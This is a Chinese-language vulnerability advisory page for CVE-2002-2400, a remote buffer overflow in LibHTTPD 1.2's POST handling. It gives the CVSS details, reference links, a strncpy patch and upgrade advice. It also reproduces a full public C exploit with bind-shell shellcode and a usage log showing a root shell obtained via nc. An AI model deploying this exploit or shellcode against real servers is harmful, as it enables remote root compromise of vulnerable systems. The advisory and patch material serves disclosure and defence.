CVE-2002-2400
CVSS10.0
发布时间 :2002-12-31 00:00:00
修订时间 :2016-10-17 22:28:05
NMCOE    

[原文]Buffer overflow in the httpdProcessRequest function in LibHTTPD 1.2 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long HTTP POST request.


[CNNVD]LibHTTPD POST远程缓冲区溢出漏洞(CNNVD-200212-204)

        
        LibHTTPD是一款用于嵌入设备的小型WEB服务程序。
        LibHTTPD对超长POST请求处理不正确,远程攻击者可以利用这个漏洞对LibHTTPD服务程序进行缓冲区溢出攻击,以WEB进程在系统上执行任意指令。
        检查libhttpd.a库中的'api.c'源代码,发现860行的httpdProcessRequest()函数对用户提交的输入缺少正确检查,提交超长POST请求可导致不经过充分边界检查而直接进行拷贝操作,发生缓冲区溢出,精心构建提交请求数据可能以WEB进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2400
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-2400
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-204
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/bugtraq/2002-11/0305.html
(PATCH)  BUGTRAQ  20021124 LibHTTPD Vulnerability and fix
http://marc.info/?l=bugtraq&m=103720432411860&w=2
(UNKNOWN)  BUGTRAQ  20021113 Remote Buffer Overflow vulnerability in Lib HTTPd.
http://www.iss.net/security_center/static/10615.php
(UNKNOWN)  XF  libhttpd-httpdprocessrequest-bo(10615)
http://www.securiteam.com/unixfocus/6H00I2060I.html
(UNKNOWN)  MISC  http://www.securiteam.com/unixfocus/6H00I2060I.html
http://www.securityfocus.com/bid/6172
(PATCH)  BID  6172

- 漏洞信息

LibHTTPD POST远程缓冲区溢出漏洞
危急 边界条件错误
2002-12-31 00:00:00 2002-12-31 00:00:00
远程  
        
        LibHTTPD是一款用于嵌入设备的小型WEB服务程序。
        LibHTTPD对超长POST请求处理不正确,远程攻击者可以利用这个漏洞对LibHTTPD服务程序进行缓冲区溢出攻击,以WEB进程在系统上执行任意指令。
        检查libhttpd.a库中的'api.c'源代码,发现860行的httpdProcessRequest()函数对用户提交的输入缺少正确检查,提交超长POST请求可导致不经过充分边界检查而直接进行拷贝操作,发生缓冲区溢出,精心构建提交请求数据可能以WEB进程权限在系统上执行任意指令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * "dong-h0un U" <xploit@hackermail.com>提供了如下第三方补丁:
        === api.patch ===
        --- api.c Sat Nov 9 20:06:30 2002
        +++ api.patch.c Sat Nov 9 20:05:33 2002
        @@ -867,7 +867,7 @@
        httpContent *entry;
        
        server->response.responseLength = 0;
        - strcpy(dirName, httpdRequestPath(server));
        + strncpy(dirName, httpdRequestPath(server), HTTP_MAX_URL);
        cp = rindex(dirName, '/');
        if (cp == NULL)
        {
        厂商补丁:
        Hughes Technologies
        -------------------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        Hughes Technologies libHTTPD 1.2:
        INetCop Security Patch libhttpd.patch
        
        http://downloads.securityfocus.com/vulnerabilities/patches/libhttpd.patch

        Hughes Technologies Upgrade libHTTPD v1.3
        
        http://www.hughes.com.au/products/libhttpd/libhttpd-1.3.tar.gz

- 漏洞信息 (22016)

LibHTTPD 1.2 POST Buffer Overflow Vulnerability (EDBID:22016)
linux remote
2002-11-13 Verified
0 Xpl017Elz
N/A [点击下载]
source: http://www.securityfocus.com/bid/6172/info

LibHTTPD is vulnerable to a buffer overflow condition. By passing a POST request of excessive length, it is possible to overrun a static buffer. This may result in sensitive locations in memory being overwritten by attacker-supplied values.

Successful exploitation of this vulnerability may allow an attacker to execute arbitrary code with super user privileges.

It should be noted that this vulnerability was reported in LibHTTPD v1.2. It is not yet known whether earlier versions are affected. 

/*
**
** Lib HTTPd Remote Buffer Overflow exploit
**                             by Xpl017Elz
** __
** Testing exploit:
**
** bash$ (./0x82-Remote.libhttpdxpl;cat)|nc libhttphost 80
**
** (Ctrl+c)
** punt!
** bash$ nc libhttphost 3879
** uname
** Linux
** id
** uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),
** 3(sys),4(adm),6(disk),10(wheel)
** exit
** bash$
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.i21c.net
**
*/

#include <stdio.h>
int main(/* args? */)
{
    int shadd2r;
    char b1ndsh[] = /* 129byte bindshellcode */
        "\211\3451\322\262f\211\3201\311\211\313C\211]\370C\211]\364K\211M\374\215M"
        "\364\315\2001\311\211E\364Cf\211]\354f\307E\356\017'\211M\360\215E\354\211E"
        "\370\306E\374\020\211\320\215M\364\315\200\211\320CC\315\200\211\320C\315"
        "\200\211\3031\311\262?\211\320\315\200\211\320A\315\200\353\030^\211u"
        "\b1\300\210F\007\211E\f\260\013\211\363\215M\b\215U\f\315\200\350\343\377"
        "\377\377/bin/sh";
    //--- POST &shellcode ---//
    fprintf(stdout,"POST ");
    for(shadd2r=0;shadd2r<0x408;shadd2r+=4)
    {/* rEDhAT Default: 0x804e482,
        Debian Address? */
        fprintf(stdout,"\202\344\004\b");
    }
    fprintf(stdout,"\r\n");
    //--- NOP,shellcode ---//
    for(shadd2r=0;shadd2r<0x3e8;shadd2r++)
    {/* SSSSSSSS...SSSSSSSSS;;; */
        fprintf(stdout,"S");
    }
    fprintf(stdout,"%s\r\nx0x\r\nx82\r\nl0l\r\n",b1ndsh);
}

		

- 漏洞信息

59841
LibHTTPD httpdProcessRequest Function POST Request Handling Overflow
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability Upgrade
Exploit Public Vendor Verified, Uncoordinated Disclosure

- 漏洞描述

- 时间线

2002-11-13 Unknow
Unknow 2002-11-24

- 解决方案

Upgrade to version 1.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站